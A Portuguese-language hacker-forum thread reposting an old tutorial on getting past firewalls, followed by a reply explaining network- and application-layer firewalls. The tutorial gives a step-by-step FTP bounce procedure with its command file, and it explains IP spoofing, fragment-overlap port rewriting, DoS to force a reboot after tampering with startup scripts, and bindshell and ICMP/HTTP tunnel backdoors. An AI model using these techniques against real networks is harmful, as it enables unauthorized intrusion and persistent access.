Contra Firewall's

_Dr4k0_ · 29 de June , 2006, 05:20:15 PM

Desenvolvido por Nash Leon vulgo coracaodeleao.
http://paginacomoexploitparaobrowserbug ... acker.html para ler
as instrucoes para aquisicao do premio."

Acho muito dificil ele nao ir visitar a pagina..:), logo ele foi
induzido a pratica de uma acao que pode ser tirada como proveito.

Em todas as implemetacoes com uso de Trojans Horses, voce estah a merce do
usuario que poderah executar o trojan, ou seja, se ele for esperto, voce
pode se dar mal e ateh mesmo se expor.Entao, mano, Trojan Horse soh depois
que os esquemas abaixo tiverem falhado.

3.2. - Bounce FTP
------------------

Alguns Firewalls filtram pacotes atraves da checagem dos Datagramas.Um
Exemplo de um esquema desses pode ser um servidor de ftp ftp.alvo.com.
Digamos que alvo.com possua um ip 200.200.199.1, e este firewall soh
permite conexoes neste servidor de ftp, IPs que compreendem de 200.200.199.1
ateh 200.200.199.255, ou seja, somente a classe C do IP do servidor
(200.200.199.*), voce nao estah nessa classe, entao voce precisaria
conseguir um IP que estah dentro desta classe.Pacientemente voce scaneia a
rede e descobre que existe um servidor de FTP aberto em um dos hosts que
possuem permissao para se conectar ao ftp.alvo.com, chamaremos este
servidor de ftp.ponte.gov.Voce poderia usar este host como "ponte" entre
voce e o servidor ftp.alvo.com, enganando assim o firewall.Um metodo para se
fazer isto eh conhecido como 'FTP BOUNCE'.Logico que se seus conhecimentos
forem maiores voce poderia exploitar o sistema intermediario e de lah mesmo
se conectar ao sistema alvo.Mas a questao aqui eh que voce quer enviar
pacotes para o servidor alvo.com.Vamos analisar um ataque amplamente
descrito na Internet, que foi originalmente publicado por Hobbit, que
consiste em baixar um arquivo do servidor de FTP ftp.alvo.com(arquivo.txt)
via servidor ponte de FTP ftp.ponte.gov.

O ataque consiste basicamente no seguinte:

Assumindo que voce possui um servidor de ftp que faz modo passivo.Abra uma
conexao de FTP para o ip de sua propria maquina(sem ser localhost) e
logue-se nela.Mude para um diretorio conveniente que voce tenha acesso a
escrita e entao faca:

quote "pasv"
quote "stor foobar"

Anote o endereco e a porta que sao retornadas pelo comando PASV, exemplo
123,234,122,23,102,121.Esta sessao de FTP deve ser entao suspensa, entao
jogue-a para background, ou entao abra outro console ou janela para dar
sequencia a este esquema.

Construa um arquivo contendo comandos de servidor de FTP.Exemplo segue
abaixo:

user ftp
pass -anonymous@
cwd /restrito
type i
port F,F,F,F,X,X
retr arquivo.txt
quit
^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
...

Podemos chamar este arquivo de "instrs".F,F,F,F,X,X eh o mesmo endereco
e porta que sua propria maquina colocou em suas maos na primeira conexao.
O lixo no fim sao linhas extras que voce criou, cada linha contem 250
NULLS e nada mais, suficiente para encher 60k de dados extra.A razao para
este enchimento eh explicado mais abaixo.

Abra uma conexao para ftp.ponte.gov, logue-se nele como anonymous e
cd /incoming.Agora digite o seguinte nesta sessao de FTP:

put instrs
quote "port C,C,C,C,0,21"
quote "retr instrs"

Isto irah transferir uma copia do seu arquivo "instrs" e entao chamarah
ftp.C,C,C,C,0,21 que eh o endereco IP e as portas para conexao no alvo.Apos o
download do arquivo arquivo.txt, ele deverah aparecer com o nome de foobar em
sua maquina via a sua primeira conexao de FTP, ou seja, no seu proprio
host.Se uma conexao para ftp.ponte.gov nao pode terminar por sih mesma,
apague seu arquivo "instrs" e saia do servidor.De outro modo voce terah que
reconectar ao servidor para terminar.

Podemos notar neste esquema que ele pode ser usado para passar por
Tripwire,Filtros e Firewalls via implementacoes Bouncing.Existem scanners
de portas que se utilizam desta fraqueza e varios outros esquemas tambem sao
implementados via esse problema.Hoje em dia a maioria dos servidores de
FTP nao sao mais vulneraveis a isto, mas ainda existem hosts a merce
desta tecnica, variantes dela, bem como solucao de problemas poderao
serem vistos no txt do *Hobbit*, link para o mesmo segue no item final
'Links e Referencias'.

3.3. - SPOOF
-------------

A Beleza desta tecnica eh incontestavel, creio que esta eh uma das tecnicas
fucadoras mais "conhecida" em todo o mundo, no entanto, nao sao tantas as
pessoas que a dominam.As tecnicas que envolvem o conceito de SPOOF(IP
Spoof, DNS Spoof e etc) sao caracterizadas basicamente pela adulteracao do
IP origem do emissor, ou seja, um atacante envia um pacote para uma rede
alvo com IP de uma rede diferente da rede a que ele se encontra.Esta
tecnica tem suas diversas utilidades e dentre elas a 'passagem de pacotes'
por um Firewall, ou seja, uma Rede A pode enviar pacotes para uma rede B,
voce se encontra num host C sem permissao de envio de pacotes para a
rede B, logo, atraves das tecnicas de SPOOF, eh possivel voce mandar
pacotes como se fosse A para a rede B, vejamos uma ilustracao para isto:

           ___
--------   IP de A    | F |
| Rede A | ----------| I | - - -
--------       | R |     |     --------
          | E | - - - - - - -| Rede C |
----------   IP de C    | W |        | Alvo |
| Rede C | ----------| A |        --------
| atacante | | L |
---------- | L |
           ---

No esquema acima, o FIREWALL irah filtrar os pacotes e permitir somente
que os pacotes vindos com endereco da 'Rede A' possam chegar ao destino,
no caso, a Rede C.

Um atacante poderia entao enviar pacotes com endereco origem forjado, ou
seja, adulterados com o endereco da Rede A, fazendo o FIREWALL pensar
que o pacote estah vindo de um host com permissao, logo, ele permitiria
a chegada desses pacotes na Rede C.Vejamos abaixo uma ilustracao para isto:

___
-------- IP de A | F |
| Rede A | -----| I | - - -
-------- | | R | | --------
| | E | - - - - - - -| Rede C |
---------- | | W | | Alvo |
| Rede B | ---- | A | --------
| atacante | | L |
---------- | L |
---

Note que a Rede A nao estah enviando um pacote e sim a Rede C, mas no
entanto o pacote estah indo com endereco origem de A, o FIREWALL poderia
entao ser enganado e o pacote malicioso poderia entao chegar na rede Alvo.

Existem varias implementacoes de SPOOF, como eu jah havia dito.Nao vou
entrar em detalhes mais tecnicos, mas mandar um pacote forjado via IP
SPOOF eh relativamente facil.Varios DoS usam este conceito.Tem gente que
nao ve nada de util em DoS, mas existem casos em que ele eh necessario,
por exemplo, digamos que voce acesse um servidor Red Hat Apolo antigo,
como um usuario normal e neste servidor haja um arquivo em /etc/rc.d com
permissao de escrita para todo mundo.Voce mudaria o arquivo para execucao
de codigo malicioso, mas como reiniciar a maquina se voce ainda nao eh root?
Aih que vem o DoS como uma tecnica boa e eficaz! Outros esquemas podem ser
vistos em servidores r*, mas foge ao objetivo deste tutorial descrever isto.

Eh possivel ateh mesmo scanearmos um servidor atras de informacoes uteis
usando IP SPOOF.Mais dados sobre SPOOF no item 'TERMINANDO',no final deste
arquivo texto.

3.4. - Fragmentacao de Pacotes.
--------------------------------

Elite, nao leia!!!! Nao acrescentarei nenhum i ao que jah foi divulgado
Internet a fora!Nao perca seu tempo lendo isto aqui!

Esta eh uma tecnica muito interessante e as implementacoes que sao
possiveis usando a mesma podem ser consideradas infindaveis.De todas as
tecnicas que vimos ateh agora, para mim esta eh a mais interessante e
tambem a que mais estah envolvida em 'escuridao', ou seja, o pessoal que
mexe com hacking ou cracking mais avancado nao divulga informacoes sobre
a mesma, pois eh enorme o numero de Firewalls vulneraveis a implementacao
desta tecnica.O Uso dela eh bastante abrangente, pode-se "passar"
literalmente por um firewall tornando o Firewall completamente inutil do
ponto do vista do invasor, mas no entanto esta tecnica eh muito usada em
programas DoS, principalmente para sistemas Windows.Para que possamos
entende-la plenamente eu irei descrever algo sobre o que eh a Fragmentacao
de Pacotes no TCP/IP.Abaixo segue a definicao do conceito(extraido do livro
'Arquiteturas de Redes de Computadores - OSI e TCP/IP - Brisa'):

- Como um datagrama trafega atraves de diversos tipos dee rede e cada
tecnologia tem um tamanho de bloco diferente, a camada IP possui o
mecanismo de 'fragmentacao', para garantir que um datagrama possa
atravessar redes que utilizem tamanhos de blocos de transmissao diferentes.
Quando for necessario transportar um datagrama de tamanho maior do que
aquele que a sub-rede pode suportar, o mecanismo de fragmentacao eh
acionado.O datagrama original eh particionado em "fragmentos".O tamanho
de fragmento eh determinado de maneira a poder ser transportado em um
unico bloco de transmissao da sub-rede.
Os fragmentos sao transportados como se fossem datagramas independentes
ateh o destino.Ao receber o primeiro fragmento, a estacao inicia uma
temporizacao para aguardar o conjunto completo de fragmentos; se algum
faltar, o datagrama eh descartado.Assim,o processo de fragmentacao provoca
uma perda de eficiencia devido a preservacao dos fragmentos ateh a estacao
destinataria(mesmo que sejam transportados por sub-redes com tamanho de
blocos superiores) e devido ao aumento do indice de retransmissao nos
casos de perda de fragmentos, quando, entao, o datagrama completo eh
descartado.
Para fragmentar um datagrama longo, sao criados varios datagramas menores
que recebem uma copia do cabecalho do datagrama original sendo alguns dos
seus campos modificados.Nos datagramas criados, o tamanho da parte de dados
eh multiplo de 8 octetos e estah limitado pelo tamanho maximo do bloco de
transmissao permitido na sub-rede.Pode ser que o ultimo fragmento nao seja
multiplo de 8 octetos.Na definicao do tamanho do fragmento sao levadas em
conta a parte dos dados e a do cabecalho.A primeira parte dos dados do
datagrama original eh inserida no primeiro fragmento e neste o campo
'comprimento total' eh atualizado com o tamanho dessa parte de dados e
do cabecalho.Nesse primeiro fragmento, um dos bits do campo 'flags',
chamado bit 'mais-fragmentos', recebe o valor 1 para indicar que mais
fragmentos deverao seguir-se.O seu campo de offset de fragmento permanece
igual ao do datagrama original.
O restante dos dados eh inserido em fragmentos subsequentes.Nestes, o
campo 'comprimento total' corresponde a quantidade de dados efetivamente
enviada.O valor do 'offset de fragmento' em cada um desses fragmentos eh
a soma do 'offset de fragmento' e do numero de octetos de dados do
fragmento anterior.Se o fragmento nao for o ultimo, o bit 'mais-fragmentos'
do campo 'flags' recebe o valor 1; caso contrario, o valor "0".Alem destes
campos, outros podem ser alterados, como o campo de opcoes, o campo de
comprimento de cabecalho e o checksum.
Na recepcao, um datagrama eh reconhecido como fragmento pela indicacao
do bit 'mais-fragmentos' do campo 'flags' e da ocorrencia de valor
diferente de zero no campo 'offset de fragmento'(exceto se for o primeiro
fragmento).Os fragmentos de um mesmo datagrama sao identificados atraves
do campo 'identificacao', dos enderecos IP de origem e de destino e do
campo de protocolo, copiados a partir do datagrama original no momento da
fragmentacao.O ultimo fragmento eh identificado por ter o campo 'mais-
fragmentos' igual a zero e pelo valor diferente de zero do campo 'offset
de fragmento'.

Este eh o basico sobre fragmentacao de pacotes IP.Este livro,"Arquiteturas
de Redes de Computadores - OSI e TCP/IP - Brisa" realmente eh um bom livro.
Recomendo a aquisicao do mesmo, mas caso nao de, de uma olhada nos RFCs.
Abaixo segue um exemplo de um cabecalho IP:

0 3 4 7 8 15 16              32
----------------------------------------------------------------------
|versao | IHL | Tipo de servico | Comprimento Total |
----------------------------------------------------------------------
| Identificacao | flags | Offset de fragmento |
----------------------------------------------------------------------
| Tempo de vida | Protocolo | checksum do cabecalho |
----------------------------------------------------------------------
| Endereco de origem |
----------------------------------------------------------------------
| Endereco de destino |
----------------------------------------------------------------------
| opcoes | padding |
----------------------------------------------------------------------
| dados |
----------------------------------------------------------------------

Se quiser mais detalhes sobre isso, de uma olhada no meu Tutorial Basico
de Programacao de Sockets em C para Linux que pode ser obtido na pagina
do Unsekurity Team, por esses dias mais material sobre TCP/IP deve estar
sendo publicado por lah.

O Ataque via Fragmentacao de pacotes acontece justamente com base no modo
como os pacotes sao reunidos(reagrupados) no final da fragmentacao.Os
Datagramas foram imaginados para serem fragmentados sobre pacotes que
deixam a parte do cabecalho do pacote intacta exceto por uma modificacao
do pedaco do pacote fragmentado e o enchimento do campo de um offset do
cabecalho IP que indica em qual byte do datagrama completo o pacote atual
deverah comecar.No reagrupamento, o reagrupamento IP cria um pacote temporario
com uma parte fragmentada do datagrama no lugar e adiciona fragmentos que
estao a caminho para seus respectivos campos de dados no offset especificado
com o datagrama sendo reagrupado.Assim que o datagrama completo eh
reagrupado, ele eh processado como se ele tivesse vindo como um pacote
unico(singular).De acordo com a especificacao do Protocolo IP, pacotes
fragmentados sao para serem reagrupados no host receptor.Isto presumivelmente
faz com que eles nao sejam imaginados(ou supostos) para serem reagrupados em
'sitios' intermediarios como firewalls ou roteadores.Esta decisao foi feita
provavelmente para prevenir repeticoes de reagrupamentos e refragmentacao
em redes intermediarias.Quando Roteadores e Firewalls seguem as regras,
eles encontram um problema peculiar.

O Modo que os Firewalls e Roteadores bloqueiam servicos especificos como
telnet enquanto permitem outros servicos como HTTP eh encontrado sobre o
pacote IP para determinar qual porta TCP estah sendo usada.Se a porta
corresponde a 80, o datagrama eh destinado ao servico HTTP e passa pelo
Filtro perfeitamente, se a porta corresponde a 23, o datagrama eh
destinado ao servico TELNET e o filtro barra a entrada do pacote.Em
datagramas normais, isto funciona perfeitamente.Mas suponha que nos nao
seguimos as regras para fragmentacao e criamos pacotes fragmentados
impropriamente? Abaixo seguem possiveis passos para a implementacao deste
esquema:

* Cria-se um pacote inicial que clama ser o primeiro fragmento de um datagrama
de um pacote multi-fragmentado.Especifica a porta TCP 80 no cabecalho
TCP.O Filtro irah encontrar um pacote com porta destino igual a 80 e
permitirah a passagem pois este servico (HTTP) nao eh filtrado em nosso
exemplo.

* O Filtro entao passa o pacote para o host sobre ataque e passa os pacotes
subsequentes em ordem para que o host destino possa reagrupar os pacotes.

* Um dos pacotes subsequentes pode entao possuir um offset de 0 que causa
o reagrupamento para sobrescrever a parte inicial do pacote IP.Esta eh a
parte do pacote IP que especifica a porta TCP destino.O atacante entao
sobrescreve o numero da porta que era originalmente 80 com um novo numero
de porta, por exemplo, 23.Entao, a partir de agora ele possui acesso
garantido ao servico TELNET no host sobre ataque, despistando assim o
firewall.

Interessante, nao??? Acho que se eu fosse administrador de rede e na minha
rede tivesse um Firewall e um SO de codigo-fonte fechado, eu temeria muito
esta tecnica.A implementacao dela, como podemos ver torna um Firewall
completamente "INUTIL".Um administrador deve ter muito juizo ao escolher
um Firewall e um SO para a instalacao em sua rede, senao, um invasor com
conhecimentos avancados pode literalmente 'brincar' com o sistema dele.

3.5. - Backdoors Sobre Firewalls.
----------------------------------

Muitos sao os tipos possiveis de backdoor sobre Firewalls, e como sempre,
depende de cada caso, a implementacao eficiente destas tecnicas.Existem
esquemas quase que 'padronizados' de configuracao de Firewall, o que eu
digo eh o seguinte:

* Algumas portas de alguns servicos nao possuem qualquer filtragem, recebendo
pacotes de qualquer lugar da internet, exemplo disso eh a porta 80(http);

* Alguns servidores permitem envio e recebimento de pacotes ICMP,UDP e
outros, sendo que alguns necessitam disso para poderem fazer checagens de
roteamento e de erros no roteamento e etc;

Na grande maioria dos sistemas que usam Firewall, uma simples bindshell pode
ser usada para abrir uma porta que nao estah configurada para ser 'filtrada'
pelo Firewall,o proprio netcat pode ser usado com um bindshell, logo, uma
backdoor bindshell seria um bom exemplo de backdoor sobre firewall.
Alem do mais, as tecnicas de camuflagem de bindshell podem ser expansivas
com o uso de LKMs ou alteracao de binarios tornando uma backdoor do tipo
bindshell de dificil percepcao.

Mas dependendo da rede, um fucador precisa ir mais longe e implementar
uma backdoor que canaliza um 'Tunel'.Os tuneis sao conhecidos justamente
por essa particularidade que eh, poderem passar por Firewalls.Como vimos
acima, existem redes que permitem envio de pacotes por qualquer host
localizado na internet a uma porta do sistema, no exemplo(80).Existem
diversas implementacoes de Tuneis que canalizam dados atraves da porta
80, seria uma especie de servidor remoto na porta 80.Como o Firewall do
alvo nao filtra pacotes na porta 80, ele nao teria como barrar a entrada
destes pacotes.Na parte de 'Links e Referencias' voce pode encontrar mais
material sobre isto.

Outro tipo de Tunel segue um padrao em cima de um protocolo que um Firewall
nao filtra.Por exemplo, o ICMP.Varios sistemas permitem o envio e recebimento
de pacotes ICMP sem filtragem de enderecos, logo, um invasor poderia instalar
um tunel capaz de enviar comandos atraves de datagramas ICMP a uma backdoor
(servidor)em ICMP.Como o Firewall nao filtra pacotes ICMP, ele deixaria os
pacotes passarem, deixando o servidor alvo a merce de execucao de comandos
maliciosos.
Existem Tuneis em varios protocolos, sendo os mais difundidos, os para ICMP
e para UDP.Mais informacoes sobre eles, consulte os links na parte 'Links
e Referencias'.

Dependendo de qual Firewall se encontra em um sistema, eh possivel ainda
construir uma backdoor em cima do seu binario.O ipfw do Linux eh um
exemplo disso, atraves de um LKM voce pode esconder sniffers e bindshell
facilmente da 'filtragem' que ele executa, ou seja, eh possivel que ele
esteja configurado para 'filtrar' acesso a uma porta X, mas atraves do
LKM, voce pode engana-lo, deixando que o sistema receba os pacotes.

Outras implementacoes ainda podem serem feitas em alguns casos, como:

* Backdoor usando fragmentacao de pacotes;
* Backdoor atraves de Bouncers;
* Adulteracao da Configuracao do Firewall;
* Adulteracao ou troca dos binarios de um Firewall;
* Redirecionamento de Executaveis de um Firewall;

Enfim, esquemas para backdoors em cima de Firewalls tem de sobra, fora
as que eu desconheco por completo.Uma vez o sistema na mao de um invasor,
fica dificil para um administrador de sistemas nao ter seu sistema alterado
de forma eficiente para permitir um acesso futuro deste invasor.

----------------
4. - TERMINANDO |
----------------

Sem duvida que um Firewall aumenta a seguranca de um sistema.Deve sempre
ser usado, mas se voce eh administrador de um sistema eh bom estar atento
as diversas formas com que um invasor pode passar por seu Firewall.Para
um fucador, essas sao apenas as tecnicas basicas que eu conheco, devem
existir muitas outras por aih, pesquise e vah fundo!! Eu sei que a
construcao de programas para a execucao desta tecnica nao eh facil, mas
parte abaixo 'Links e Referencias' voce acharah muito material sobre o
que foi descrito neste txt, mas o importante eh voce procurar entender o
conceito e expandir o conceito! Amigo, NewBie, de tempo ao tempo!! Se voce
se esforcar, certamente um dia irah conseguir fazer seus proprios
programas e nao irah depender de terceiros!! Eu acredito em voce!!

4.1. - Links e Referencias
---------------------------

Aqui seguem Links onde voce poderah achar mais material sobre os itens
abordados no decorrer deste txt.

* SOBRE FTPBOUNCE:

http://packetstorm.securify.com/docs/hack/ftpbounce.txt
http://packetstorm.securify.com/UNIX/ut ... .25.tar.gz
http://www.insecure.org/nmap/

* SOBRE SPOOF:

IP-Spoofing Demystified by Daemon9
URL: http://www.2600.com/phrack/p48-14.html

http://packetstorm.securify.com/spoof/ip-spoof-guides/
http://packetstorm.securify.com/spoof/
http://packetstorm.securify.com/UNIX/sc ... a54.tar.gz

OBS: No momento a pagina da phrack estah derrubada, recomendo ir na 2600.

* SOBRE FRAGMENTACAO DE PACOTES:

http://teso.scene.at/releases/lamescan-1.0.tar.gz -> scan em frag.
http://packetstorm.securify.com/docs/hack/frag.txt -> txt do hobbit.
http://packetstorm.securify.com/UNIX/sc ... a54.tar.gz
http://www.enteract.com/~lspitz/fwtable.html -> Fragmentacao em FW1.

* SOBRE BACKDOORS SOBRE FIREWALLS:

Placing Backdoors Through Firewalls by van Hauser
http://www.infowar.co.uk/thc/files/thc/fw-backd.htm

http://teso.scene.at/releases/itunnel-1_2.tar.gz -> ICMP tunel.
http://packetstorm.securify.com/UNIX/mi ... l_v1-0.tgz
http://packetstorm.securify.com/UNIX/mi ... 0.3.tar.gz
http://www.infowar.co.uk/thc/files/thc/ ... l-1.6.perl
http://packetstorm.securify.com/UNIX/mi ... 0.2.tar.gz

Project Loki: ICMP Tunneling by daemon9
URL: http://www.2600.com/phrack/p49-06.html

LOKI2 (the implementation) by route
URL: http://www.2600.com/phrack/p51-06.html

TXT do module sobre ICMP Tunel
URL: http://unsekurity.virtualave.net/txts/i ... neling.txt

* OUTROS:

Piercing Firewalls by bishnu
URL: http://www.2600.com/phrack/p52-16.html

http://sites.inka.de/lina/freefire-l/tools.html

Anonymous · 15 de August , 2006, 07:12:53 PM

Apenas para tornar mais claro o texto, estarei colocando um texto básico, entretanto essencial.

(Ficarei devendo a fonte do texto, um brother meu me enviou e não colocou)

Firewall
Entendendo o Firewall
Firewall é o sistema principal dispositivo de segurança da NET. Ele é na verdade um sistema, ou um grupo deles, através do qual flui o tráfego de dados entre duas redes distintas. A partir disto pode-se implementar uma segurança, que consiste num pacote que determina o que pode ou não passar de uma rede e outra. Este sistema é, na maioria das vezes usados contra clientes mal intencionados, os crackers.
Resumidamente o firewall é o seguinte: um HD possuidor de duas placas de rede, uma ligada à rede corporativa e outra ligada à NET. E executa o pacote específico d rastreamento. Dando chance d conseguir analisar e filtrar o pacote enviado.
Mas o que é e o que não é considerado perigoso?
Isto, quem decidirá será a política d segurança dos proprietários d firewall.
Existem 2 tipos d firewall: um q analisa a camada d rede, o pacote IP, e outro q analisar a camada de aplicação, dentro do pacote IP.
Firewall analisado a camada d rede
Estes se limitam ao nível d IP. Decidindo o destino dos pacotes (aceito ou não), tendo como base: remetente, porta IP utilizada e endereço d destinatário.
Qualquer roteador pode ser configurado pro firewall, mas será um firewall simples. Isto fará com q vc ele fique protegido contra lammers comuns, mas pode ser vítima d atakes clássicos e comuns. Como por exemplo: o IP Spoofer.
Em mákinas bem configuradas o firewall concede acesso apenas a computadores considerados d confiança (CPUs conhecidos). Para introduzir-se numa makina bem configurada é nescessário fazer com q ela o considere confiável. Isto s chama spoonfing. Q consiste em mandar pacotes com o endereço legítimos d uma maquina d rede interna. A vítima crerá q o atacante é d confiança e responderá enviando pacotes para o endereço do remetente.
No entanto o cracker deve tomar precauções: a 1º é certificar-se q a máquina legítima não responda aos pacotes. Isto eh feito garantindo-se q a máquina esteja off-line. A segunda delas é garantir q akeles pacotes sejam enviados para a NET. Já q a mákina legítima encontra-se dentro da rede interna. Para isto é usado o "source routing". Q consiste numa técinica criada pra testes e opturação. Ela permite q a máquina q inicia a comunicação especifike qual a rota d todos os pacotes d uma certa conexão. Isto faz com q os pacotes sejam expelidos da rede pra a internet
Firewalls sofisticados não permitem o uso do spoofing e do souce-routing, pois eles, além de rotear o pacotes para seus destinos tb mantém informações sobre o estado das conexões e sobre o conteúdo do pacote o q permite saber q não pode-se enviar um pacote com indereço pertencente à rede interna à internet. O firewall irá caracterizar isto como um atake e tomará a devidas providências.
Firewalls sofisticados, ou não, são transparentes e rápidos pois roteiam tráfegos diretos mas é exatamente isto q impede de analizar o conteúdo efetivo do pacote e tb exige q as mákinas na rede interna possuam um endereço IP válido
Firewall analisado a camada de aplicação
Estes normalmente são CPUs d rede d uso geral q rodam programas chamados: "proxy serves" . Este tipo d firewall não permite comunicações diretas entre duas redes, pois rekerem o estabelecimento d duas conexões. Uma delas do remetente proxy e a Segunda entre o remetente e o destinatário.
Uma característica q vale averiguar eh a d q todo pacote antes d ser ecoado e analizado pelo proxy server. Este irá decidir s o pacote deve ou não ser descartado. Vale saber q dev a estas caracteríscas o firewall d aplicação oferece uma segurança maior do o firewall d rede, pois consegue perceber perigo em um pacote q o d rede não conseguiria.
Dois exemplos d coisas q este tipo d defesa pode filtrar são:
O 1º é DEBUG do SMTP q é usado para pedir a um servidor d correio q forneça algumas informações d controle. O q eh considerado risco.
Um segundo exemplo são os Proxys FTP, q vedam o acesso d usuários externos, mas mesmo assim, permite q os funcionários copiem arkivos da NET para a rede.
Cada um dessas vantagens dependem do funcionamento do protocólo d defesa, sendo q, estes, não poderiam ser colocados nos firewall de rede, já q não são capazes d analizar o conteúdo do pacote IP
Firewall d rede são mais transparente do q os d aplicaçãoo, já q os d aplicação exige a existência de um proxy, além d proibir a comunicação direta entre o servidos e o cliente. É nescessário q o programa cliente saiba q deve estabelecer com o proxy e determinar ações. Então basta configurar o browser corretamente. Muitas vezes os clientes não são sofisticados o suficiente, e necessitam d conexões diretas com o servidor, neste caso utiliza o seguinte artifício: o usuário se loga no proxy e este; em vez de solicitar nome e senha (como seria de esperar), solicita o nome do servidor com o qual se deseja a conexão; a partir daí, tudo funciona normalmente.
Vantagens do firewall d aplicação:
- permite uma analise muito mais próxima entre duas redes.
- o fato d q DNS ser um proxy server permite identificar o nome das máquinas internas e preserve-os, e q um mesmo nome pode identificar duas makinas da origem d kem a consulta.
- Além disso o firewall d aplicação protege o endereço original das mákinas internas, já q basta saber o endereço das portas esternas do firewall. Isto trás vários benefícios, o simples fato da pessoa não saber o endereço real já da mais segurança. Além disto é q permite o uso d faixas reservadas d endereço q nuam podem ser utilizada na NET, isto faz com q seja impossível algum cliente enviar pacotes diretamente às máquinas internas. Além disto, o uso destes endereços possibilita d + endereços do q os concedidos pelos provedores.
Bem, seria difícil dizer qual eh o melhor tipo d firewall, esta discu;cão ainda permanece, mas uma solução entendida pelos melhores sistemas d firewall é adotar os dois tipos. Sendo q os pacotes passam pelos dois níveis d firewall
Empresas gastam fortunas em firewalls errados (ou seja, com uma política d segurança incoerente). Mas a grande solução q vejo é a seguinte: se um computador possui informações muito confidenciais ele não precisa do firewall mais caro q o dinheiro pode comprar, mas sim, deve não s conectar à NET. Desde q não seja paranóica a ponto d não deixar q as pessoas trabalhem.

Espero que esse texto possa agragar valores.
473nc!0$4|v|3n73:: C4x5

FORUM DARKERS

Contra Firewall's

_Dr4k0_

Anonymous